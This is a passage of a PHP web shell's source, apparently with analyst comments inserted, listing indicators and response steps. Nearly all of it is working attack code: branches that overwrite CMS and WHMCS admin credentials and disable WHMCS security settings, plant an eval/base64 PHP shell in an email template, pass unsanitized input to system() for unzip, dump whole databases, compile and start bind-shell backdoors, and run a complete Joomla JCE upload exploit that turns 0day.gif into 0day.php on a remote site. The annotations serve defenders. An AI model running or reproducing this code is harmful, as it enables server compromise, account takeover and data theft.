7392<input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
7393NEW ADMIN LOGIN PASS<br/>
7394<input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
7395
7396<input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' >
</form>";
/* Runs on every request to this branch, with or without posted data. Connects
   with the legacy mysql_* functions (errors suppressed with @), then issues
   four UPDATE statements built by string concatenation: username and
   user_password on <prefix>users where user_id = '2', and aid and pwd on
   <prefix>authors where radminsuper = '1'. The new password is stored as an
   unsalted md5() of the posted value. The success message reflects only the
   result of the last query.
   Where the DB credentials come from is outside this branch; presumably they
   are harvested by the config-symlink modules of this shell.
   Response: after finding this shell, treat every database credential stored
   in readable config files on the host as exposed and rotate it, and compare
   the admin rows of these tables against a known-good backup. */
$anu1 = $_POST['anu1']; $anu2 = $_POST['anu2']; $anu3 = $_POST['anu3']; $anu4 = $_POST['anu4']; @mysql_connect($anu1,$anu3,$anu4); @mysql_select_db($anu2); $userbaru=str_replace("\'","'",$userbaru); $ganti_user = $_POST['userbaru']; $passbaru=str_replace("\'","'",$passbaru); $hash_pass = $_POST['passbaru']; $ganti_pass = md5($hash_pass); $prefix = $_POST['prefix']; $table_name1 = $prefix."users" ; $table_name2 = $prefix."authors" ; $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'"; $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'"; $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'"; $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'"; $oke=@mysql_query($okenuke1); $oke=@mysql_query($okenuke2); $oke=@mysql_query($okenuke3); $oke=@mysql_query($okenuke4); if($oke) { echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmtool')) { ?>
7397 <form action="?y=<?php echo $pwd; ?>&x=whmtool" method="post">
7398 <?php echo "<html><head><title>Whmcs Tools</title></head>"; echo "<body><center>
7399<h2>--=[~] Cyber Roulette [~]=--</h2>
7400<h3>WHMCS Inject Shell | Auto Bypass Security Token | Login Changer Tools</h3>
7401<form method=POST action=''>
7402<p>
7403WHMCS DB HOST<br/>
7404<input value=localhost style='color:lime;background-color:#000000' type=text name=anu1 size='40'><br/>
7405WHMCS DB NAME<br/>
7406<input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
7407WHMCS DB USERNAME<br/>
7408<input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
7409WHMCS DB PASSWORD<br/>
7410<input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/> <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
7411<input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
7412NEW ADMIN LOGIN USER<br/>
7413<input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
7414NEW ADMIN LOGIN PASS<br/>
7415<input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/>
7416SHELL TYPE {PHP}<br/>
7417<textarea style='color:lime;background-color:#000000' rows='10' cols='80'
7418name=shell>{php}eval(base64_decode('$c0de = base64_decode('GIF89aP;<p align="center">
7419
7420<?php
7421error_reporting(0);
7422$scriptname = $_SERVER['SCRIPT_NAME'];
7423$filename = $_POST["filename"];
7424if($_POST["submit"] == "Open")
7425{
7426if(file_exists($filename))
7427{
7428$filecontents = htmlentities(file_get_contents($filename));
7429if(!$filecontents)
7430$status = "<font face='Verdana' style='font-size: 8pt'>Error Nothing File</font>";
7431}
7432else
7433$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
7434}
7435else if($_POST["submit"] == "Delete")
7436{
7437if(file_exists($filename))
7438{
7439if(unlink($filename))
7440$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
7441else
7442$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
7443}
7444else
7445$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
7446}
7447else if($_POST["submit"] == "Save")
7448{
7449$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
7450if(file_exists($filename))
7451unlink($filename);
7452$handle = fopen($filename, "w");
7453if(!$handle)
7454$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
7455else
7456{
7457if(!fwrite($handle, $filecontents))
7458$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
7459fclose($handle);
7460}
7461$filecontents = htmlentities($filecontents);
7462}
7463else
7464{
7465$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
7466}
7467?>
7468<table border="0" align="center"><tr><td><table width="100%" border="0"><tr><td>
7469<form method="post" action="<?Echo $scriptname;?>">
7470<input style="color:lime;background-color:#000000" name="filename" type="text" value="<?Echo $filename;?>" size="72">
7471<input type="submit" style="color:lime;background-color:#000000" name="submit" value="Open">
7472<input type="submit" style="color:lime;background-color:#000000" name="submit" value="Delete"></td></tr></table>
7473<font face="Verdana" style="font-size: 11pt">
7474<textarea name="contents" style="color:lime;background-color:#000000" cols="70" rows="25">
7475<?Echo $filecontents;?></textarea></font><br>
7476<input type="submit" style="color:lime;background-color:#000000" name="submit" value="Save">
7477<input type="reset" style="color:lime;background-color:#000000" value="Reset">
7478</form>
7479<p>
7480<h3>_UPLOAD FILE_<h3>
7481
7482<?php
7483
7484echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
7485
7486echo 'PATH TARGET : <input name="uploadto" style="color:lime;background-color:#000000" type="text" size="50" value="'.getcwd().'"><br />';
7487echo '<input type="file" style="color:lime;background-color:#000000" name="file" size="30"><input name="_upl" style="color:lime;background-color:#000000" type="submit" id="_upl" value="Upload"></form>';
7488if( $_POST['_upl'] == "Upload" ) {
7489if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
7490
7491echo '<font color="lime">[+] Upload Sukses :v <br/> [+] '.$_POST['uploadto']."/".$_FILES['file']['name'];
7492} else {
7493echo '[~] Upload Failed T_T [~]</font><br>';
7494} }
7495?>
7496');
7497
7498$fopen = fopen ('dm.php','w');
7499$write = fwrite($fopen , $c0de);'));{/php}</textarea><br/>
7500
7501<p><input type=submit style='color:lime;background-color:#000000' value=' >> GO >> ' ></form>
7502<p>[~] Coded By <a href='hxxps://www.facebook.com/r00t.info/'>olivia48</a> <br/>
7503[~] Thanks To FB Group <a href='hxxps://www.facebook.com/r00t.info/'>JCA</a> <br/>
7504[~] Thanks To All Member JCA"; $anu1 = $_POST['anu1']; $anu2 = $_POST['anu2']; $anu3 = $_POST['anu3']; $anu4 = $_POST['anu4']; @mysql_connect($anu1,$anu3,$anu4); @mysql_select_db($anu2); $shell=str_replace("'","'",$shell); $gosok_shell = $_POST['shell']; $idmaho=str_replace("\'","'",$idmaho); $target_id = $_POST['idmaho']; $userbaru=str_replace("\'","'",$userbaru); $ganti_user = $_POST['userbaru']; $passbaru=str_replace("\'","'",$passbaru); $hash_pass = $_POST['passbaru']; $ganti_pass = md5($hash_pass); $colok1 = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE id ='9'"; $colok2 = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'"; $colok3 = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'"; $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'"; $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'"; $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'"; $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'"; $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'"; $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'"; $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'"; $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'"; $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'"; $crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'"; $udah_ganteng=@mysql_query($crot1); $udah_ganteng=@mysql_query($crot2); $udah_ganteng=@mysql_query($crot3); $udah_ganteng=@mysql_query($crot4); $udah_ganteng=@mysql_query($crot5); $udah_ganteng=@mysql_query($crot6); $udah_ganteng=@mysql_query($crot7); $udah_ganteng=@mysql_query($crot8); $udah_ganteng=@mysql_query($crot9); $udah_ganteng=@mysql_query($crot10); $udah_ganteng=@mysql_query($colok1); 
$udah_ganteng=@mysql_query($colok2); $udah_ganteng=@mysql_query($colok3); if($udah_ganteng) { echo "<font color='lime'>SUKSES BOS GANTENG :P</font>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'unzip')) { ?>
7505 <form action="?y=<?php echo $pwd; ?>&x=unzip" method="post">
7506 <?php
// Analyst note: "unzip" branch of the web shell. The POST field `file` is
// concatenated, unquoted and unvalidated, into a command line handed to
// system(), so anyone who can reach this page controls that command line.
// Host-side signal: the web-server account spawning `unzip -o`.
$file = $_POST['file']; if (isset($file)) { echo "<b>[+] PROSES BONGKAR [+]</b><br><br>"; system('unzip -o ' . $file); exit; }
// No file posted: list the current directory and offer each entry matching
// /.zip$/i as a radio button. Entry names are echoed into the page unescaped.
$handler = opendir("."); echo "<br><br><b>Pilih File Yg Mau Di Unzip :<b><br> " . "<br>"; echo '<form action="" method="get">'; $found = false; while ($file = readdir($handler)) { if (preg_match ("/.zip$/i", $file)) { echo '<input type="radio" name="file" value=' . $file . '> ' . $file . '<br>'; $found = true; } } closedir($handler); if ($found == false) echo "<br><br><b>[+] GA ADA FILE EXTENSI ZIP [+]<b><br>"; else echo '<br><br><INPUT type="submit" value="HAJAR BRAY :v">'; echo "</form>"; ?>
7507 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcsploit')) { ?>
7508 <form action="?y=<?php echo $pwd; ?>&x=whmcsploit" method="post">
7509 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/whmcs.php" width="100%"></iframe>
7510 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysqlback')) { ?>
7511 <form action="?y=<?php echo $pwd; ?>&x=mysqlback" method="post">
7512 <?php echo '<center><br><br><br>
7513<table class="tabnet" border=1 width=400 style="border-collapse: collapse" cellpadding=2>
7514<tr>
7515<td width=400 colspan=2 ><p align=center>
7516<b><font face=Arial size=2 >Backup Database</font></b>
7517</td></tr>
7518<tr>
7519<td width=150>
7520<font face=Arial size=2>DB Type:</font></td>
7521<td width=250>
7522<form method=post action="'.$me.'">
7523<select class="inputz" name=method>
7524<option value="gzip">Gzip</option>
7525<option value="sql">Sql</option>
7526</select></td></tr>
7527<tr>
7528<td width=150>
7529<font face=Arial size=2>Server:</font>
7530</td>
7531<td width=250>
7532<input type=text class="inputz" name=server value=localhost size=35>
7533</td></tr>
7534<tr>
7535<td width=150><font face=Arial size=2>Username:</font></td>
7536<td width=250><input type=text class="inputz" name=username size=35></td>
7537</tr>
7538<tr>
7539<td width=150><font face=Arial size=2>Password:</font></td>
7540<td width=250><input type=text class="inputz" name=password></td>
7541</tr>
7542<tr>
7543<td width=150><font face=Arial size=2>Data Base Name:</font></td>
7544<td width=250><input type=text class="inputz" name=dbname></td>
7545</tr>
7546<tr>
7547<td width=400 colspan=2><center><input class="inputzbut" type=submit value=" Dump! " ></td>
7548</tr>
7549</table></form></center></table>';
// Analyst note: "mysqlback" branch - bulk database export. Runs only when the
// POST fields username, dbname and method are all non-empty; server, user,
// password and database name are taken straight from the request.
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method'];
// The dump is created under a relative path (the script's working directory)
// and is linked for download at the end of this branch. Hunting: files named
// "Dump-<dbname>-<YYYY-MM-DD>.sql" or ".sql.gz" inside web-served directories.
if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); }
// write(): append $data to the global handle $fp, using fwrite() for the
// "sql" method and gzwrite() otherwise.
function write($data) { global $fp; if ($_POST['method']=='sql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }}
// filesize_n(): filesize() with a fallback that shells out to `ls -al | awk`
// when the reported size is negative; $path is placed between double quotes in
// that command line without further escaping.
function filesize_n($path) { $size = @filesize($path); if( $size < 0 ){ ob_start(); system('ls -al "'.$path.'" | awk \'BEGIN {FS=" "}{print $5}\''); $size = ob_get_clean(); } return $size; }
// format_size(): render a byte count with a unit suffix; returns 'n/a' for 0.
function format_size($size) { $sizes = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB"); if ($size == 0) { return('n/a'); } else { return (round($size/pow(1024, ($i = floor(log($size, 1024)))), $i > 1 ? 2 : 0) . $sizes[$i]); } }
// Export loop: SHOW TABLES, then for every table its SHOW CREATE TABLE text
// followed by one INSERT statement per row. The mysql_* functions used here
// belong to the legacy extension removed in PHP 7, so this branch can only run
// on older runtimes.
mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='sql'){ fclose ($fp); }else{ gzclose($fp);}
// Report the size of the dump and print the download link to it.
$sizedatabasefile = filesize_n($file); $sizehumanreadable = format_size($sizedatabasefile); echo "<br><br>
7550<center><font color='#FF0000'>Download Database -> </font>
7551<a href='$file'>Here</a>
7552<font color='#FF0000'> | DatabaseFileSize -> $sizehumanreadable </font></center>"; flush(); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'traintup')) { ?>
7553 <form action="?y=<?php echo $pwd; ?>&x=traintup" method="post">
7554 <?php echo "<html><head><title>TraindtUpLoginChanger</title></head>"; echo "<body><center>
7555<h2>^_^ Cyber Roulette ^_^</h2>
7556<h3>TraindtUp UsEr-PaSs FuCk3r</h3>
7557<form method=POST action=''>
7558DB HOST<br/>
7559<input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
7560DB NAME<br/>
7561<input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
7562DB USER<br/>
7563<input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
7564DB PASSWORD<br/>
7565<input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
7566<hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
7567<input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
7568NEW ADMIN LOGIN USER<br/>
7569<input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
7570NEW ADMIN LOGIN PASS<br/>
7571<input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
7572
7573<input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
// Analyst note: "traintup" branch - admin credential takeover by direct
// database write. Host, database name, user and password come from the POST
// fields anu1..anu4; connection errors are suppressed with @.
$anu1 = $_POST['anu1']; $anu2 = $_POST['anu2']; $anu3 = $_POST['anu3']; $anu4 = $_POST['anu4']; @mysql_connect($anu1,$anu3,$anu4); @mysql_select_db($anu2);
// The str_replace() calls operate on $idmaho, $userbaru and $passbaru, which
// are not otherwise assigned in this excerpt; the values used in the queries
// are read from $_POST. The new password is stored as an unsalted md5() digest.
$idmaho=str_replace("\'","'",$idmaho); $target_id = $_POST['idmaho']; $userbaru=str_replace("\'","'",$userbaru); $ganti_user = $_POST['userbaru']; $passbaru=str_replace("\'","'",$passbaru); $hash_pass = $_POST['passbaru']; $ganti_pass = md5($hash_pass);
// Two UPDATE statements on table `admin` set admin_user and admin_password for
// the posted admin_id; all values are concatenated into the SQL text.
// Incident response: compare `admin` rows against a known-good backup and look
// for the form's default username "admin-ganteng".
$sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'"; $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'"; $oke=@mysql_query($sodok1); $oke=@mysql_query($sodok2); if($oke) { echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'bind')) { ?>
7574 <form action="?y=<?php echo $pwd; ?>&x=bind" method="post">
7575 <?php
// Analyst note: "bind" branch - starts a password-protected listener on the
// compromised host. tulis(), Exe() and which() and the payload variables
// $port_bind_bd_c / $port_bind_bd_pl are defined outside this excerpt
// (presumably file-write, command-execution and binary-lookup helpers - confirm
// against the full listing). POST fields port and bind_pass are trimmed and
// then concatenated into the command lines.
// Host-side signals: the web-server account running gcc, chmod 777, perl or
// `ps aux`; files named bdc.c (deleted after the build), bdc or bdp in the
// script directory; a new listening socket owned by the web-server account.
if($_POST['bind']) { if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); Exe('gcc -o bdc bdc.c'); Exe('chmod 777 bdc'); @unlink("bdc.c"); Exe("./bdc ".$port." ".$passwrd." &"); $scan = Exe("ps aux"); if(eregi("./bdc $por",$scan)) { $msg = "Process found running, backdoor setup successfully."; } else { $msg = "Process not found running, backdoor not setup successfully."; } } elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); Exe("chmod 777 bdp"); $p2=which("perl"); Exe($p2." bdp ".$port." &"); $scan = Exe("ps aux"); if(eregi("$p2 bdp $port",$scan)) { $msg = "Process found running, backdoor setup successfully."; } else { $msg = "Process not found running, backdoor not setup successfully."; } } } echo "</textarea>";
// Form defaults: the password field is pre-filled with the resolved address of
// the request's Host header and the port field with 443. The key "hxxp_HOST"
// appears to be an artifact of URL defanging applied to the whole paste.
echo "<br><br><center><form method=POST><input style='color:#FF0000;background-color:#000000' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["hxxp_HOST"])."'><input type='text' name='port' style='color:#FF0000;background-color:#000000'size='26' value='443'><select style='color:#FF0000;background-color:#000000' name='use'><option value='Perl'>Perl</option><option value='C'>C</option></select> <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'></form></center>"; ?>
7576 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ascii')) { ?>
7577 <form action="?y=<?php echo $pwd; ?>&x=ascii" method="post">
7578 <center><H1>This tools maded for you to Encode ASCII to Hex for your Nice SQL Injection ;)</H1></center>
7579 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://www.asciitohex.com/" width="100%"></iframe>
7580 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'jce')) { ?>
7581 <form action="?y=<?php echo $pwd; ?>&x=jce" method="post">
7582 <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<html>
7583<head>
7584<title>JCE Joomla Extension Remote File Upload</title>
7585</head>
7586
7587<body bgcolor="#00000">
7588
7589<p align="center"><font size="4" color="#00ff00">JCE Joomla Extension Remote File Upload</font></p>
7590</font>
7591<table width="90%">
7592 <tbody>
7593 <tr>
7594 <td width="43%" align="left">
7595 <form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data" method="post">
7596 <p></font><font color="#00ff00" > hostname (ex:www.sitename.com): </font><input class="inputz" name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
7597 <p></font><font color="#00ff00" > path (ex: /joomla/ or just / ): </font><input class="inputz" name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
7598 <p></font><font color="#00ff00" >Please specify a file to upload: </font><input class="inputz" type="file" name="datafile" size="40"><font color="#FF0000"> * </font>
7599 <p><font color="#00ff00" > specify a port (default is 80): </font><input class="inputz" name="port" size="20"><span class="Stile5"></span></p>
7600 <p><font color="#00ff00" > Proxy (ip:port): </font><input class="inputz" name="proxy" size="20"><span class="Stile5"></span></p>
7601 <p align="center"> <span class="Stile5"><font color="#FF0000">* </font><font color="white" >fields are required</font></font></span></p>
7602 <p><input type="submit" value="Start" name="Submit"></p>
7603 </form>
7604 </td>
7605 </tr>
7606 </tbody>
7607</table>
7608</body></html>';
// Analyst note: "jce" branch - automated file upload against the Joomla JCE
// editor component of a third-party site, driven from the compromised host.
// sendpacket(): open a TCP connection to $host:$port (or to the ip:port given
// in $proxy), send the raw request text and, when $response is 1, read the
// reply into the global $html. With $s set to 1 the reply is searched for the
// listed version strings followed by "</title"; a match prints
// "Target patched." and ends the script.
function sendpacket($packet,$response = 0,$output = 0,$s=0) { $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; global $proxy, $host, $port, $html, $user, $pass; if ($proxy == '') { $ock = fsockopen($host,$port); stream_set_timeout($ock, 5); if (!$ock) { echo '<font color=white> No response from '.htmlentities($host).' ...<br></font>'; die; } } else { $parts = explode(':',$proxy); echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>'; $ock = fsockopen($parts[0],$parts[1]); stream_set_timeout($ock, 5); if (!$ock) { echo '<font color=white>No response from proxy...<br></font>'; die; } } fputs($ock,$packet); if ($response == 1) { if ($proxy == '') { $html = ''; while (!feof($ock)) { $html .= fgets($ock); } } else { $html = ''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html .= fread($ock,1); } } } else $html = ''; fclose($ock); if ($response == 1 && $output == 1) echo nl2br(htmlentities($html)); if ($s==1){ $count=0; $res=nl2br(htmlentities($html)); $str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title'); foreach ($str as $value){ $pos = strpos($res, $value); if ($pos === false) { $count=$count++; } else { echo "<font color=white>Target patched.<br/><br/></font>"; die(); } } if ($count=10) echo '<font color=white>Target is exploitable.<br/><br/></font>'; } }
// Target host, path, port and optional proxy are taken from the POST form.
// The "hxxp" spellings in the request lines below appear to be an artifact of
// URL defanging applied to the whole paste.
$host = $_POST['host']; $path = $_POST['path']; $port = $_POST['port']; $proxy = $_POST['proxy']; if (isset($_POST['Submit']) && $host != '' && $path != '') { $port=intval(trim($port)); if ($port=='') {$port=80;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font color=white>Error... 
check the path!</font>');} if ($proxy=='') {$p=$path;} else {$p='hxxp://'.$host.':'.$port.$path;} $host=str_replace("\r\n","",$host); $path=str_replace("\r\n","",$path);
// Indicators for Joomla site owners, all taken from the requests built below:
// User-Agent "BOT/0.1 (BOT for JCE)"; requests to index.php with
// option=com_jce&task=plugin&plugin=imgmanager; an upload named 0day.gif whose
// body starts with "GIF89a1"; a folderRename call turning /0day.gif into
// 0day.php; and a follow-up request for images/stories/0day.php.
// Mitigation: run a JCE release at or above the versions this code treats as
// patched, and deny script execution under the images/ upload tree.
$packet = "GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,1); $content = "GIF89a1\n"; $content .= file_get_contents($_FILES['datafile']['tmp_name']); $data = "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n"; $data .= "/\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"; $data .= "0\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "0day\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n"; $data .= "upload\r\n"; $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n"; $packet = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: 
ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Proxy-Connection: close\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n"; $packet .= $data; sendpacket($packet,0,0,0); $packet = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $packet .= "Accept-Language: en-US,en;q=0.8\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"; $packet .= "Accept-Encoding: deflate\n"; $packet .= "X-Request: JSON\r\n"; $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n"; $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}"; $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n"; $packet .= $ren."\r\n\r\n"; sendpacket($packet,1,0,0); $packet = "Head ".$p."/images/stories/0day.php hxxp/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,0); if(stristr($html , '200 OK') != true) {echo "<font color=white>Exploit Faild...</font>";} else echo "<font color=white>Exploit 
Succeeded...<br>hxxp://$host:$port$path"."/images/stories/0day.php</font>"; } ?>
7609 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'idfinder')) { ?>
7610 <form action="?y=<?php echo $pwd; ?>&x=idfinder" method="post">
7611 <script language="Javascript">
7612<!--
7613<div style="font-family: verdana;">
7614<center>
7615<strong>Facebook ID Finder</strong><br>
7616<br>
7617<small>
7618<div style="text-align: center;">
7619<p>Tool ini berguna bagi anda yang ingin mengetahui ID Profile Facebook.</p>
7620<p>Bukan hanya Profil, tapi anda juga bisa mencari ID aplikasi halaman, dll.</p>
7621<p>Tulis username anda (www.facebook.com/INI USERNAME) , halaman, atau aplikasi,</p>
7622<p>kemudian klik <strong>Get Facebook ID.</strong></p>
7623</div>
7624</small>
7625<br>
7626<center>
7627<form action="hxxps://graph.facebook.com/?id=" method="get"><input class="textinput" name="id" size="35" type="text"> <input class="buttonsubmit" name="submit" value="Get Facebook ID" type="submit"></form>
7628</center>
7629<div style="text-align: center;">
7630<p><small>Tool ini dibuat oleh : <strong><a href="hxxp://dfc48.blogspot.com/" target="_blank">DFC48</a></strong></small></p>
7631
7632</div><br/>
7633<div id="fb-root"></div>
7634<script>(function(d, s, id) {
7635 var js, fjs = d.getElementsByTagName(s)[0];
7636 if (d.getElementById(id)) return;
7637 js = d.createElement(s); js.id = id;
7638 js.src = "//connect.facebook.net/id_ID/all.js#xfbml=1";
7639 fjs.parentNode.insertBefore(js, fjs);
7640}(document, 'script', 'facebook-jssdk'));</script>
